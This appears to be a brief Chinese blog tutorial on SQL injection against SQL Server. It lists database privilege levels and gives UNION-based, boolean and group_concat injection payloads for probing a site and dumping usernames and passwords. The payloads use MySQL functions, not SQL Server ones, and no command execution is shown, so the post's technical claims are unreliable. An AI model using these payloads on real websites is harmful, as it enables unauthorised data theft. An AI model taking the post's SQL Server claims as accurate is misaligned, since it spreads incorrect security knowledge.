sql server注入执行命令

小桥流水2016

 关注

阅读 159

2022-11-19


1. mssql权限

  • sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限
  • db权限:文件管理,数据库操作等 users-administrators
  • public权限:数据库操作 guest-users

2、sql server注入执行命令

查询数据库版本,数据库名字,用户名,操作系统

select * from member where id=-1 union select version(),database(),user(),@@version_compile_os;
//sql server注入执行命令

sql server注入执行命令_文件管理

判断注入点—报错查询

select * from member where id=1 and 1=1;
select * from member where id=1 and 1=2;
//sql server注入执行命令

sql server注入执行命令_数据库_02

group_concat 查询

将查询的内容连在一起,列如:

select group_concat(username,pw) from  member where id=1; 
//sql server注入执行命令

 

sql server注入执行命令_数据库操作_03

 

相关推荐

sql注入 mysql 执行命令 sql注入以及解决的办法

开源GIS定制化开发方案 35 0 0

java执行命令

苦茶如歌 112 0 0

linux远程执行命令

梯梯笔记 102 0 0

Linux 开机执行命令

朱悟能_9ad4 137 0 0

python commands执行命令详解

陌岛 157 0 0

利用paramiko批量执行命令

就是耍帅 146 0 0

shell关闭buffer执行命令

林塬 106 0 0

【golang】golang使用exec执行命令

IT影子 50 0 0

Java中使用ProcessBuilder执行命令

王远洋 43 0 0

vim打开文件时执行命令

夕阳孤草 202 0 0

精彩评论(0)

0 0 举报